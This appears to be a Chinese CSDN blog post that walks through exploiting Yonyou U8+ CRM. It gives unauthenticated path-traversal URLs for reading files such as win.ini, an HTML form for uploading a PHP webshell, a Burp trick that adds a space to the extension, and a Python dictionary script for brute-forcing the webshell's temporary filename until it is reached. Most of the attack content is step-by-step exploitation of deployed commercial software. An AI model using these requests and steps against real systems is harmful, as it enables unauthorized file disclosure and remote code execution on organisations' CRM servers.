用友U8+ CRM任意文件上传、任意文件读取 实战

文章揭示了用友CRM系统存在的安全问题,包括任意文件读取(如通过/ajax/getemaildata.php访问敏感信息)和任意文件上传漏洞,详细描述了利用过程,如构造上传页面,通过BurpSuite抓包修改后缀名,并利用爆破工具寻找上传的PHP木马文件。
摘要由CSDN通过智能技术生成

用友CRM系统,使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞

用友U8+ CRM系统主界面


任意文件读取

存在漏洞的文件为:

/ajax/getemaildata.php

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt

可以看到用友版本7.2 patch2

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

可以看到C://windows/win.ini

image-20230224171301663


任意文件上传

首先构造一个文件上传的页面

<html>

<form action="http://IP:端口//ajax/getemaildata.php?DontCheckLogin=1" method="post" enctype ="multipart/form-data"> 

  <input type="file" name="file" /> 

  <input type="submit" name="upload" value="upload"/>

</form>

</html>

选择php一句话木马

image-20230224171532696

打开burp进行抓包,在文件上传的后缀名处添加一个空格

image-20230224171701750

返回的tmpfile\\mht3AC8.tmp.mht即为木马地址,访问http://IP:端口/tmpfile//mht3AC8.tmp.mht即可看到未解析的马。木马的位置为tmpfile/upd****.tmp.php,将前面的mht改为upd,将后面的mht改为php

image-20230224172102022

抓包,将其放到爆破工具里,爆破中间的3AC8,范围是从0000~FFFF,共65536个

image-20230224172257758

生成字典的脚本如下:

with open('1.txt', 'w') as f:
    for i in range(0x10000):
        f.write(format(i, '04X') + '\n')

该脚本会在当前目录下生成1.txt

image-20230224172641017

成功访问到马

image-20230224172720429

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值